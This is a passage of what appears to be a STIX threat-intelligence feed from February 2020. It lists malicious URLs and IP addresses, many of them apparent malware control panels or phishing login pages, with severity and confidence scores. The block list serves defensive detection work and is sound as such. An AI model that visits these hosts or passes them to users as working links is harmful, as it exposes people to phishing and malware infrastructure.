http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:33.111Z"} +{"created":"2020-02-20T05:18:47.389Z","description":"TS ID: 55330801620; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ac992a06-7013-4af2-b5c0-5c99f556d5b0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-20T05:18:47.389Z","name":"mal_url: http://rds2020.space/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rds2020.space/login']","type":"indicator","valid_from":"2020-02-20T05:18:47.389Z"} +{"created":"2020-02-20T05:18:47.406Z","description":"TS ID: 55330801615; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--d723c08e-997d-483e-91e0-2ba6048e3683","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-02-20T05:18:47.406Z","name":"mal_url: http://vysyyvyvm.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vysyyvyvm.myjino.ru/login']","type":"indicator","valid_from":"2020-02-20T05:18:47.406Z"} +{"created":"2020-02-20T05:18:47.424Z","description":"TS ID: 55330801583; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--734a20dd-4f6e-4ca9-8eac-4cdd6b82a122","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T05:18:47.424Z","name":"mal_url: http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:47.424Z"} +{"created":"2020-02-20T05:18:52.122Z","description":"TS ID: 55328307475; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--e4109b4c-b56f-4f16-818f-0db54e50f5e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-20T05:18:52.122Z","name":"mal_url: http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:18:52.122Z"} +{"created":"2020-02-20T05:19:37.033Z","description":"TS ID: 55328307484; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--4c7e5535-9899-4967-86bb-e303b03a1122","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:19:37.033Z","name":"mal_url: http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:19:37.033Z"} +{"created":"2020-02-20T05:19:37.099Z","description":"TS ID: 55328307477; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ea537667-1f37-4050-bb51-85fee813e39c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T05:19:37.099Z","name":"mal_url: http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:19:37.099Z"} +{"created":"2020-02-20T05:19:44.991Z","description":"TS ID: 55328307478; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--b6919ef9-68eb-48f5-9bc5-cdb35182e3d5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-20T05:19:44.991Z","name":"mal_url: http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:19:44.991Z"} +{"created":"2020-02-20T05:19:49.844Z","description":"TS ID: 55330801566; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--ddf3b3c7-d5f7-42d7-b013-767315de4745","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-20T05:19:49.844Z","name":"mal_url: http://f0404175.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0404175.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:19:49.844Z"} +{"created":"2020-02-20T05:19:58.679Z","description":"TS ID: 55330801607; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--12edd75d-2558-498f-93a6-b628c3a21f85","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:19:58.679Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/frega/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/frega/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:19:58.679Z"} +{"created":"2020-02-20T05:21:46.589Z","description":"TS ID: 55328307479; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime","id":"indicator--7a99b0ea-a361-4d6f-9c75-a1cd9ac41b1b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:21:46.589Z","name":"mal_url: http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:21:46.589Z"} +{"created":"2020-02-20T05:22:19.894Z","description":"TS ID: 55330801609; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--09479a9a-0c30-4029-a396-afa64343f065","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:22:19.894Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/em/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/em/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:22:19.894Z"} +{"created":"2020-02-20T05:24:01.214Z","description":"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-20T05:24:01.214Z","name":"mal_url: http://f0402912.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0402912.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:01.214Z"} +{"created":"2020-02-20T05:24:21.239Z","description":"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-02-20T05:24:21.239Z","name":"mal_url: http://f0404052.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0404052.xsph.ru/login']","type":"indicator","valid_from":"2020-02-20T05:24:21.239Z"} +{"created":"2020-02-20T05:24:33.205Z","description":"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-20T05:24:33.205Z","name":"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:33.205Z"} +{"created":"2020-02-20T05:24:35.843Z","description":"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-20T05:24:35.843Z","name":"mal_ip: 193.32.188.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '193.32.188.146']","type":"indicator","valid_from":"2020-02-20T05:24:35.843Z"} +{"created":"2020-02-20T05:24:47.629Z","description":"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:24:47.629Z","name":"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.629Z"} +{"created":"2020-02-20T05:24:47.645Z","description":"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-20T05:24:47.645Z","name":"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:24:47.645Z"} +{"created":"2020-02-20T05:25:26.502Z","description":"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-20T05:25:26.502Z","name":"mal_url: http://instaboom-hello.site/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://instaboom-hello.site/login.php']","type":"indicator","valid_from":"2020-02-20T05:25:26.502Z"} +{"created":"2020-02-20T05:25:26.525Z","description":"TS ID: 55328307488; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--592a57f8-b59a-4018-9167-307225a207ef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-20T05:25:26.525Z","name":"mal_url: http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:25:26.525Z"} +{"created":"2020-02-20T05:25:29.508Z","description":"TS ID: 55328307495; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--56e543f4-111a-4764-af25-ee784f35a7c6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-20T05:25:29.508Z","name":"mal_url: http://castmart.ga/~zadmin/azrt/emma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/azrt/emma/panel/admin.php']","type":"indicator","valid_from":"2020-02-20T05:25:29.508Z"} +{"created":"2020-02-20T05:25:29.532Z","description":"TS ID: 55328307487; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a2e1a901-7ad5-4be0-9fad-7e83cb7d35a7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-20T05:25:29.532Z","name":"mal_url: http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-20T05:25:29.532Z"} +{"created":"2020-02-21T02:51:41.341Z","description":"TS ID: 55333174445; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--84d5a06f-cbc3-4504-b0d0-ea23b99182ba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-21T02:51:41.341Z","name":"mal_url: http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php']","type":"indicator","valid_from":"2020-02-21T02:51:41.341Z"} +{"created":"2020-02-21T02:51:50.176Z","description":"TS ID: 55333174449; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--56cda4af-704b-41e7-8cc3-6140c163a22a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-21T02:51:50.176Z","name":"mal_url: http://j1041747.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://j1041747.myjino.ru/login']","type":"indicator","valid_from":"2020-02-21T02:51:50.176Z"} +{"created":"2020-02-21T02:51:50.296Z","description":"TS ID: 55333174441; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--3a6903d8-e46b-4918-a99d-21ae21465bde","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-70"],"modified":"2020-02-21T02:51:50.296Z","name":"mal_url: http://sadhate.zzz.com.ua/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sadhate.zzz.com.ua/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-21T02:51:50.296Z"} +{"created":"2020-02-21T02:52:28.296Z","description":"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-21T02:52:28.296Z","name":"mal_url: http://groysman.club/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groysman.club/host/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:28.296Z"} +{"created":"2020-02-21T02:52:31.697Z","description":"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-21T02:52:31.697Z","name":"mal_url: http://nortonlilly.info/ace/ts/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace/ts/login.php']","type":"indicator","valid_from":"2020-02-21T02:52:31.697Z"} +{"created":"2020-02-21T02:52:33.704Z","description":"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:52:33.704Z","name":"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:52:33.704Z"} +{"created":"2020-02-21T02:52:34.992Z","description":"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime","id":"indicator--097b92f4-6865-49db-8e59-2a89df364749","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-21T02:52:34.992Z","name":"mal_ip: 84.38.180.229","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '84.38.180.229']","type":"indicator","valid_from":"2020-02-21T02:52:34.992Z"} +{"created":"2020-02-21T02:52:35.038Z","description":"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--03ea9edc-6654-4287-b452-988c85380295","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-21T02:52:35.038Z","name":"mal_url: http://jusper.zzz.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:35.038Z"} +{"created":"2020-02-21T02:52:38.593Z","description":"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--99f64515-7513-4764-b278-987c5df8484b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-21T02:52:38.593Z","name":"mal_url: http://azur.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://azur.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:52:38.593Z"} +{"created":"2020-02-21T02:53:25.758Z","description":"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-21T02:53:25.758Z","name":"mal_url: http://d98527ix.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d98527ix.beget.tech/login']","type":"indicator","valid_from":"2020-02-21T02:53:25.758Z"} +{"created":"2020-02-21T02:53:31.865Z","description":"TS ID: 55333174452; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--858c680e-7b33-4345-b23c-bbc2a1efb9e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-21T02:53:31.865Z","name":"mal_url: http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:53:31.865Z"} +{"created":"2020-02-21T02:53:31.9Z","description":"TS ID: 55333174443; iType: mal_url; State: active; Org: Fanavari Server Pars Argham Company Gostar Ltd.; Source: CyberCrime","id":"indicator--4a97fc3d-210e-4367-ad04-f1b966433a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-21T02:53:31.9Z","name":"mal_url: http://perca.ir/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://perca.ir/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:53:31.9Z"} +{"created":"2020-02-21T02:53:40.48Z","description":"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:53:40.48Z","name":"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:53:40.48Z"} +{"created":"2020-02-21T02:53:42.327Z","description":"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--c9d733d6-25c7-4306-9246-c08194e3073a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-21T02:53:42.327Z","name":"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:53:42.327Z"} +{"created":"2020-02-21T02:53:58.967Z","description":"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-21T02:53:58.967Z","name":"mal_url: http://liweff.eu/kp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/kp/login.php']","type":"indicator","valid_from":"2020-02-21T02:53:58.967Z"} +{"created":"2020-02-21T02:54:44.049Z","description":"TS ID: 55333174436; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-21T02:54:44.049Z","name":"mal_url: http://82.165.18.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://82.165.18.207/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:54:44.049Z"} +{"created":"2020-02-21T02:54:44.075Z","description":"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-02-21T02:54:44.075Z","name":"mal_ip: 185.90.59.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.90.59.42']","type":"indicator","valid_from":"2020-02-21T02:54:44.075Z"} +{"created":"2020-02-22T02:52:52.6Z","description":"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime","id":"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-22T02:52:52.6Z","name":"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:52.6Z"} +{"created":"2020-02-22T02:52:53.322Z","description":"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:52:53.322Z","name":"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.322Z"} +{"created":"2020-02-22T02:52:53.756Z","description":"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:52:53.756Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.756Z"} +{"created":"2020-02-22T02:52:53.779Z","description":"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:53.779Z","name":"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.779Z"} +{"created":"2020-02-22T02:52:59.853Z","description":"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime","id":"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:59.853Z","name":"mal_url: http://86.106.93.103/mpdu/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://86.106.93.103/mpdu/index.php']","type":"indicator","valid_from":"2020-02-22T02:52:59.853Z"} +{"created":"2020-02-22T02:53:10.018Z","description":"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-22T02:53:10.018Z","name":"mal_ip: 95.142.44.87","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '95.142.44.87']","type":"indicator","valid_from":"2020-02-22T02:53:10.018Z"} +{"created":"2020-02-22T02:53:11.62Z","description":"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:53:11.62Z","name":"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:11.62Z"} +{"created":"2020-02-22T02:53:34.685Z","description":"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime","id":"indicator--773fabfe-63b5-4681-8189-4dffad1747fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-46"],"modified":"2020-02-22T02:53:34.685Z","name":"mal_url: http://ccilfov.ro/css/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ccilfov.ro/css/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.685Z"} +{"created":"2020-02-22T02:53:34.733Z","description":"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--5e32213f-5daa-4181-a108-0fc58482adcb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:53:34.733Z","name":"mal_ip: 66.172.27.221","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '66.172.27.221']","type":"indicator","valid_from":"2020-02-22T02:53:34.733Z"} +{"created":"2020-02-22T02:53:34.767Z","description":"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:53:34.767Z","name":"mal_url: 